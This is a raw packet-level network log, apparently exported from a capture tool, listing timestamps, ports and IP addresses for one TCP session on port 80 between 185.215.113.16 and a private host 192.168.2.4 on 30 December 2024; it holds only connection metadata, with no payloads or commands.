Dec 30, 2024 15:53:34.874304056 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874315977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874341011 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874373913 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874458075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874469995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874480963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874490976 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874500990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874506950 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874531984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874813080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874840975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874852896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874864101 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874897957 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874903917 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874913931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874927044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874938011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.874957085 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.874975920 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875049114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875058889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875149012 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875358105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875392914 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875401974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875407934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875447989 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875456095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875466108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875474930 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875477076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875499964 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875509024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875550032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875561953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875567913 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875602961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875646114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875657082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875668049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875679970 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875689030 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875727892 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875741959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875752926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875796080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875802040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875812054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875858068 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875885963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875896931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875906944 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875929117 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.875958920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.875973940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876008034 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876049995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876060963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876071930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876081944 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876091957 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876131058 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876157999 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876168966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876178980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876188993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876202106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876240969 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876266956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876280069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876291990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876302958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876312017 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876327991 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876415014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876425982 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876435995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876444101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876456022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876466990 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876468897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876480103 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876502991 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876528025 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876554012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876564980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876581907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876595020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876611948 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876627922 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876775026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876786947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876796961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876807928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876827955 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876857042 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876866102 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876868963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876879930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876888037 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876899958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876912117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876918077 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876923084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.876941919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.876976967 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917264938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917274952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917284966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917325974 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917330027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917340994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917347908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917351961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917363882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917376041 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917402029 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917433023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917444944 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917479038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917500973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917512894 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917561054 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917572975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917583942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917596102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917606115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917614937 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917649984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917676926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917689085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917702913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917723894 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917762041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917777061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917788029 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917798042 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.917812109 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.917838097 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918092012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918103933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918116093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918142080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918164968 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918190956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918201923 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918212891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918224096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918236971 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918267965 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918297052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918308973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918319941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918330908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918344975 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918370962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918380022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918390989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918431044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918557882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918570042 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918581009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918590069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918600082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918602943 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918611050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918621063 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918632984 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.918643951 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.918677092 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.923969984 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.923995018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924002886 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924031973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924037933 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.924074888 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.924076080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924084902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924093962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924122095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924133062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.924134970 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.924166918 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.960867882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.960889101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.960900068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.960922956 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.960947037 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.960994005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961005926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961018085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961041927 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961086035 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961097002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961108923 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961117983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961133003 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961158991 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961209059 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961220980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961232901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961249113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961249113 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961276054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961278915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961317062 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961633921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961678028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961689949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961714029 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961822987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961833954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961846113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961857080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961869001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.961872101 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.961924076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962332964 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962343931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962359905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962404966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962404966 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962415934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962426901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962439060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962450027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962481022 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962615013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962625980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962636948 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962646961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962661028 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962665081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962676048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962682962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962687969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962699890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962706089 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962754011 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962785006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962795019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962805986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962830067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962845087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962857008 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962857008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962924957 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.962951899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962963104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962974072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962985039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.962996006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963000059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963006973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963028908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963046074 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963191986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963202953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963215113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963226080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963239908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963242054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963285923 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963320017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963334084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963345051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963355064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963356972 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963368893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963378906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963406086 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963454008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963464975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963483095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963494062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963498116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963509083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963517904 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963550091 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963738918 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963751078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963761091 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963772058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963783026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963785887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963793993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963804960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963815928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.963828087 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.963862896 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.978591919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004122019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004160881 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004211903 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004231930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004281998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004295111 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004307032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004332066 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004357100 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004359007 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004374027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004420996 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004539013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004551888 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004564047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004574060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004585981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004602909 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004621983 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004628897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004640102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004651070 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004661083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004668951 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004673958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004683018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004698038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004724026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004761934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004774094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004785061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004791021 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004796028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004812002 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004847050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004878044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004899979 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004934072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.004944086 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.004992962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.005009890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.005022049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.005040884 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.005067110 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.005085945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.005095959 CET	80	49744	185.215.113.16	192.168.2.4
